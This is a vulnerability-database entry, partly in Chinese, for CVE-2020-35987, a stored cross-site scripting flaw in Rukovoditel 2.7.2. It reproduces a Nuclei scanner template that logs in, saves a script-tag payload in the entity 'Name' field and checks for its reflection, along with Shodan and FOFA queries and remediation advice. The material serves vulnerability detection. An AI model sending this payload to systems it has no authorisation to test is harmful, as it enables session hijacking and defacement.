CVE-2020-35987: Rukovoditel <= 2.7.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Rukovoditel | POC: 已公开

漏洞描述

A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.

PoC代码[已公开]

id: CVE-2020-35987

info:
  name: Rukovoditel <= 2.7.2 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability.
  reference:
    - https://github.com/r0ck3t1973/rukovoditel/issues/1
    - http://rukovoditel.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-35987
    cwe-id: CWE-79
    epss-score: 0.01614
    epss-percentile: 0.81154
    cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rukovoditel
    product: rukovoditel
    shodan-query: http.favicon.hash:-1499940355
    fofa-query: icon_hash=-1499940355
  tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated

http:
  - raw:
      - |
        GET /index.php?module=users/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php?module=users/login&action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        form_session_token={{nonce}}&username={{username}}&password={{password}}
      - |
        POST /index.php?module=entities/&action=save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(content_type_3, "text/html")'
          - 'contains(body_3, "<script>alert(document.domain)</script>")'
          - 'contains(body_3, "rukovoditel")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'id="form_session_token" value="(.*)" type="hidden"'
        internal: true
# digest: 490a0046304402205b5c563012a567eae41c4eb6dbf0616e651039c96816c009209acfb8dd8f6c4502205f1979e983d1727589c429903570dc69db1cf5da57e13bcb28a7a2aaadf7b8c8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35987.yaml

相关漏洞推荐